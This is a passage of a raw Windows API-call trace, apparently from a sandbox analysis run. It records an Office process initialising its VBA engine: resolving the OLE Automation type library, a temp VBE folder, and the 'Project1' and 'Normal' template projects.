_Destination="{00020430-0000-0000-C000-000000000046}") returned 0x0 [0030.453] wcscpy_s (in: _Destination=0xb459a4a, _SizeInWords=0x36, _Source="#2.0#0#" | out: _Destination="#2.0#0#") returned 0x0 [0030.453] wcscpy_s (in: _Destination=0xb459a58, _SizeInWords=0x2f, _Source="C:\\Windows\\system32\\stdole2.tlb" | out: _Destination="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0030.453] wcscpy_s (in: _Destination=0xb459a98, _SizeInWords=0xf, _Source="OLE Automation" | out: _Destination="OLE Automation") returned 0x0 [0030.453] ITypeLib:LocalReleaseTLibAttr (This=0x731cc80) returned 0x0 [0030.453] wcscpy_s (in: _Destination=0xb52c3d8, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0030.453] ITypeLib:RemoteGetDocumentation (in: This=0x731cc80, index=-1, refPtrFlags=0x2e7478, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1) returned 0x0 [0030.453] SysStringLen (param_1="stdole") returned 0x6 [0030.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0030.453] SysStringLen (param_1="stdole") returned 0x6 [0030.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x7742fc8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0030.453] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stdole") returned 0x106093 [0030.453] strcpy_s (in: _Dst=0x2e7270, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0030.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e7270, cbMultiByte=7, lpWideCharStr=0x2e70c0, cchWideChar=7 | out: lpWideCharStr="stdole") returned 7 [0030.454] IUnknown:AddRef (This=0x782a220) returned 0x4 [0030.454] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="stdole", lHashVal=0x106093, pfName=0x2e7190, pBstrLibName=0x2e70c0 | out: pfName=0x2e7190*=0, pBstrLibName=0x2e70c0) returned 0x0 [0030.454] IUnknown:Release (This=0x782a220) returned 0x3 [0030.454] IUnknown:AddRef (This=0x731da90) returned 0x5 [0030.454] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="stdole", lHashVal=0x106093, pfName=0x2e7190, pBstrLibName=0x2e70c0 | out: pfName=0x2e7190*=0, pBstrLibName=0x2e70c0) returned 0x0 [0030.454] IUnknown:Release (This=0x731da90) returned 0x4 [0030.454] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7667980 [0030.454] IMalloc:Free (This=0x7fefe015380, pv=0xb4e3710) [0030.454] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7667b60 [0030.454] IMalloc:Free (This=0x7fefe015380, pv=0x7667980) [0030.454] wcsncpy_s (in: _Destination=0x2e7070, _SizeInWords=0x108, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _MaxCount=0x106 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0030.454] CharLowerBuffW (in: lpsz="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", cchLength=0x5e | out: lpsz="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation") returned 0x5e [0030.454] IMalloc:Alloc (This=0x7fefe015380, cb=0xbe) returned 0x765af10 [0030.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", cchWideChar=95, lpMultiByteStr=0x765af10, cbMultiByte=190, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", lpUsedDefaultChar=0x0) returned 95 [0030.454] IMalloc:Free (This=0x7fefe015380, pv=0x765af10) [0030.454] wcscpy_s (in: _Destination=0x54f1cc8, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0030.454] wcsncpy_s (in: _Destination=0x2e70b0, _SizeInWords=0x108, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _MaxCount=0x106 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0030.454] CharLowerBuffW (in: lpsz="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", cchLength=0x5e | out: lpsz="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation") returned 0x5e [0030.454] IMalloc:Alloc (This=0x7fefe015380, cb=0xbe) returned 0x765af10 [0030.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", cchWideChar=95, lpMultiByteStr=0x765af10, cbMultiByte=190, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", lpUsedDefaultChar=0x0) returned 95 [0030.454] IMalloc:Free (This=0x7fefe015380, pv=0x765af10) [0030.454] wcsncpy_s (in: _Destination=0x2e7070, _SizeInWords=0x108, _Source="*\\Z085b6852dd", _MaxCount=0x106 | out: _Destination="*\\Z085b6852dd") returned 0x0 [0030.454] CharLowerBuffW (in: lpsz="*\\Z085b6852dd", cchLength=0xd | out: lpsz="*\\z085b6852dd") returned 0xd [0030.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z085b6852dd", cchWideChar=14, lpMultiByteStr=0x2e6fa0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z085b6852dd", lpUsedDefaultChar=0x0) returned 14 [0030.454] _wcsicmp (_String1="*\\Z085b6852dd", _String2="*\\Z085b6852dd") returned 0 [0030.454] IUnknown:AddRef (This=0x731cc80) returned 0x7 [0030.454] IUnknown:QueryInterface (in: This=0x731cc80, riid=0x7fee3a764b8*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e7498 | out: ppvObject=0x2e7498*=0x0) returned 0x80004002 [0030.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x2e7460, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0030.454] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stdole") returned 0x106093 [0030.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e7800, cbMultiByte=-1, lpWideCharStr=0x2e7760, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL\\3") returned 69 [0030.458] lstrlenA (lpString="VBE") returned 3 [0030.459] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 37 [0030.459] _msize (_Block=0x93b7ca0) returned 0x26 [0030.459] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 37 [0030.459] lstrlenA (lpString="VBE") returned 3 [0030.459] _msize (_Block=0x93b7cd0) returned 0x26 [0030.459] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 37 [0030.459] lstrlenA (lpString="VBE") returned 3 [0030.459] lstrcatA (in: lpString1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", lpString2="VBE" | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" [0030.459] strcpy_s (in: _Dst=0x91dc750, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0030.460] strcpy_s (in: _Dst=0x91dc750, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0030.460] strcpy_s (in: _Dst=0x91dc750, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0030.460] strcpy_s (in: _Dst=0x91dc750, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0030.460] strcpy_s (in: _Dst=0x91dc750, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0030.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x91dc750, cbMultiByte=-1, lpWideCharStr=0x2e7570, cchWideChar=41 | out: lpWideCharStr="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 41 [0030.460] StringFromCLSID (in: rclsid=0x93b8a2c*(Data1=0x3832d640, Data2=0xcf90, Data3=0x11cf, Data4=([0]=0x8e, [1]=0x43, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x5a)), lplpsz=0x2e7840 | out: lplpsz=0x2e7840*="{3832D640-CF90-11CF-8E43-00A0C911005A}") returned 0x0 [0030.460] IMalloc:Alloc (This=0x7fefe015380, cb=0x27) returned 0x7667b60 [0030.460] IMalloc:Free (This=0x7fefe015380, pv=0x78096c0) [0030.460] lstrlenA (lpString="VBE") returned 3 [0030.460] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A}") returned 38 [0030.460] wsprintfA (in: param_1=0x91dc750, param_2="%s;%s;&H%08lX" | out: param_1="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0030.460] wsprintfA (in: param_1=0x2e7868, param_2="&H%08lX" | out: param_1="&H00000001") returned 10 [0030.460] lstrcpynA (in: lpString1=0x93b8a90, lpString2="Host Extender Info", iMaxLength=256 | out: lpString1="Host Extender Info") returned="Host Extender Info" [0030.461] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0030.461] lstrcpyA (in: lpString1=0x93b8ba0, lpString2="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000" | out: lpString1="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000" [0030.461] IMalloc:Free (This=0x7fefe015380, pv=0x7667b60) [0030.461] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7667b60 [0030.461] GetCursorPos (in: lpPoint=0x2e7a90 | out: lpPoint=0x2e7a90*(x=270, y=190)) returned 1 [0030.461] GetCapture () returned 0x0 [0030.461] WindowFromPoint (Point=0xbe0000010e) returned 0x201b0 [0030.461] GetWindowThreadProcessId (in: hWnd=0x201b0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9dc [0030.461] SendMessageA (hWnd=0x201b0, Msg=0x84, wParam=0x0, lParam=0xbe010e) returned 0x1 [0030.461] SendMessageA (hWnd=0x201b0, Msg=0x20, wParam=0x201b0, lParam=0x2000001) returned 0x1 [0030.461] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0030.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7667e38, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0030.461] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0030.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7667e38, cbMultiByte=9, lpWideCharStr=0x7667f28, cchWideChar=9 | out: lpWideCharStr="Project1") returned 9 [0030.461] IsCharAlphaA (ch=78) returned 1 [0030.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e7a90, cbMultiByte=-1, lpWideCharStr=0x93b9890, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0030.462] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0030.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e7a90, cbMultiByte=-1, lpWideCharStr=0x93b9890, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0030.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x2e78e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0030.462] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0030.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e78d0, cbMultiByte=-1, lpWideCharStr=0x2e78a0, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0030.462] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0030.462] lstrlenA (lpString="Normal") returned 6 [0030.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e78d0, cbMultiByte=-1, lpWideCharStr=0x2e7850, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0030.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x2e7790, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0030.462] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0030.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x2e77a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0030.462] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0030.462] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0030.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7667e38, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0030.462] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0030.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7667e38, cbMultiByte=9, lpWideCharStr=0x7667f28, cchWideChar=9 | out: lpWideCharStr="Project1") returned 9 [0030.462] lstrcmpA (lpString1="Project1", lpString2="Normal") returned 1 [0030.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x2e7780, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0030.462] lstrcmpiA (lpString1="Project1", lpString2="Normal") returned 1 [0030.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0030.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x2e7680, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0030.462] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0030.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a82a3e, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0030.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a82a3e, cbMultiByte=8, lpWideCharStr=0x7667e38, cchWideChar=8 | out: lpWideCharStr="Project1") returned 8 [0030.462] GetLocalTime (in: lpSystemTime=0x2e7520 | out: lpSystemTime=0x2e7520*(wYear=0x7e1, wMonth=0x8, wDayOfWeek=0x4, wDay=0x11, wHour=0xd, wMinute=0x35, wSecond=0x21, wMilliseconds=0x15c)) [0030.462] wcsncpy_s (in: _Destination=0x2e71d0, _SizeInWords=0x108, _Source="*\\Z085b6852dd", _MaxCount=0x106 | out: _Destination="*\\Z085b6852dd") returned 0x0 [0030.462] CharLowerBuffW (in: lpsz="*\\Z085b6852dd", cchLength=0xd | out: lpsz="*\\z085b6852dd") returned 0xd [0030.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z085b6852dd", cchWideChar=14, lpMultiByteStr=0x2e7100, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z085b6852dd", lpUsedDefaultChar=0x0) returned 14 [0030.463] _wcsicmp (_String1="*\\Z085b6852dd", _String2="*\\Z085b6852dd") returned 0 [0030.463] GetLocalTime (in: lpSystemTime=0x2e7520 | out: lpSystemTime=0x2e7520*(wYear=0x7e1, wMonth=0x8, wDayOfWeek=0x4, wDay=0x11, wHour=0xd, wMinute=0x35, wSecond=0x21, wMilliseconds=0x15c)) [0030.463] wcsncpy_s (in: _Destination=0x2e71d0, _SizeInWords=0x108, _Source="*\\Z085b6852dd", _MaxCount=0x106 | out: _Destination="*\\Z085b6852dd") returned 0x0 [0030.463] CharLowerBuffW (in: lpsz="*\\Z085b6852dd", cchLength=0xd | out: lpsz="*\\z085b6852dd") returned 0xd [0030.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z085b6852dd", cchWideChar=14, lpMultiByteStr=0x2e7100, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z085b6852dd", lpUsedDefaultChar=0x0) returned 14 [0030.463] _wcsicmp (_String1="*\\Z085b6852dd", _String2="*\\Z085b6852dd") returned 0 [0030.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x2e7590, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0030.463] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0030.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x2e7590, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0030.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x2e7450, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0030.463] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0030.463] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0030.463] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dad40 [0030.463] IMalloc:Free (This=0x7fefe015380, pv=0x7809660) [0030.463] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7667aa0 [0030.463] IMalloc:Free (This=0x7fefe015380, pv=0x76dad40) [0030.463] wcsncpy_s (in: _Destination=0x2e7250, _SizeInWords=0x108, _Source="*\\Z085b6852dd", _MaxCount=0x106 | out: _Destination="*\\Z085b6852dd") returned 0x0 [0030.463] CharLowerBuffW (in: lpsz="*\\Z085b6852dd", cchLength=0xd | out: lpsz="*\\z085b6852dd") returned 0xd [0030.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z085b6852dd", cchWideChar=14, lpMultiByteStr=0x2e7180, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z085b6852dd", lpUsedDefaultChar=0x0) returned 14 [0030.463] _wcsicmp (_String1="*\\Z085b6852dd", _String2="*\\Z085b6852dd") returned 0 [0030.463] strcpy_s (in: _Dst=0x7803190, _DstSize=0x7, _Src="Normal" | out: _Dst="Normal") returned 0x0 [0030.463] SysStringByteLen (bstr="潎浲污") returned 0x6 [0030.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7667e38, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0030.463] SysStringByteLen (bstr="潎浲污") returned 0x6 [0030.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7667e38, cbMultiByte=7, lpWideCharStr=0x7667aa8, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0030.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x2e76b0, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0030.463] lstrlenA (lpString="Normal") returned 6 [0030.463] SysStringByteLen (bstr="潎浲污") returned 0x6 [0030.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7667e38, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0030.463] SysStringByteLen (bstr="潎浲污") returned 0x6 [0030.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7667e38, cbMultiByte=7, lpWideCharStr=0x7667aa8, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0030.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x2e7890, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0030.464] lstrlenA (lpString="Normal") returned 6 [0030.474] lstrcmpiW (lpString1="Normal", lpString2="") returned 1 [0030.475] wcscpy_s (in: _Destination=0x2e76f6, _SizeInWords=0x105, _Source="Normal" | out: _Destination="Normal") returned 0x0 [0030.475] _wcsicmp (_String1="*\\CNormal", _String2="*\\Z085b6852dd") returned -23 [0030.475] IUnknown:AddRef (This=0x782a220) returned 0x4 [0030.475] IUnknown:QueryInterface (in: This=0x782a220, riid=0x7fee3a76290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e7158 | out: ppvObject=0x2e7158*=0x0) returned 0x80004002 [0030.475] IUnknown:Release (This=0x782a220) returned 0x3 [0030.475] IUnknown:AddRef (This=0x731da90) returned 0x5 [0030.475] IUnknown:QueryInterface (in: This=0x731da90, riid=0x7fee3a76290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e7158 | out: ppvObject=0x2e7158*=0x0) returned 0x80004002 [0030.475] IUnknown:Release (This=0x731da90) returned 0x4 [0030.475] IUnknown:AddRef (This=0x731cc80) returned 0x6 [0030.475] IUnknown:QueryInterface (in: This=0x731cc80, riid=0x7fee3a76290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e7158 | out: ppvObject=0x2e7158*=0x0) returned 0x80004002 [0030.475] IUnknown:Release (This=0x731cc80) returned 0x5 [0030.475] wcsncpy_s (in: _Destination=0x2e6e20, _SizeInWords=0x108, _Source="*\\Z085b6852dd", _MaxCount=0x106 | out: _Destination="*\\Z085b6852dd") returned 0x0 [0030.475] CharLowerBuffW (in: lpsz="*\\Z085b6852dd", cchLength=0xd | out: lpsz="*\\z085b6852dd") returned 0xd [0030.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z085b6852dd", cchWideChar=14, lpMultiByteStr=0x2e6d50, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z085b6852dd", lpUsedDefaultChar=0x0) returned 14 [0030.476] _wcsicmp (_String1="*\\Z085b6852dd", _String2="*\\Z085b6852dd") returned 0 [0030.476] wcsncpy_s (in: _Destination=0x2e6e20, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0030.476] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0030.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x2e6d50, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0030.476] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0030.476] wcscpy_s (in: _Destination=0xb532cf8, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0030.476] wcsncpy_s (in: _Destination=0x2e6e20, _SizeInWords=0x108, _Source="*\\Z085b6852dd", _MaxCount=0x106 | out: _Destination="*\\Z085b6852dd") returned 0x0 [0030.476] CharLowerBuffW (in: lpsz="*\\Z085b6852dd", cchLength=0xd | out: lpsz="*\\z085b6852dd") returned 0xd [0030.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z085b6852dd", cchWideChar=14, lpMultiByteStr=0x2e6d50, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z085b6852dd", lpUsedDefaultChar=0x0) returned 14 [0030.476] _wcsicmp (_String1="*\\Z085b6852dd", _String2="*\\Z085b6852dd") returned 0 [0030.476] wcsncpy_s (in: _Destination=0x2e6e60, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0030.476] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0030.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x2e6d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0030.476] wcscpy_s (in: _Destination=0x7844790, _SizeInWords=0x108, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 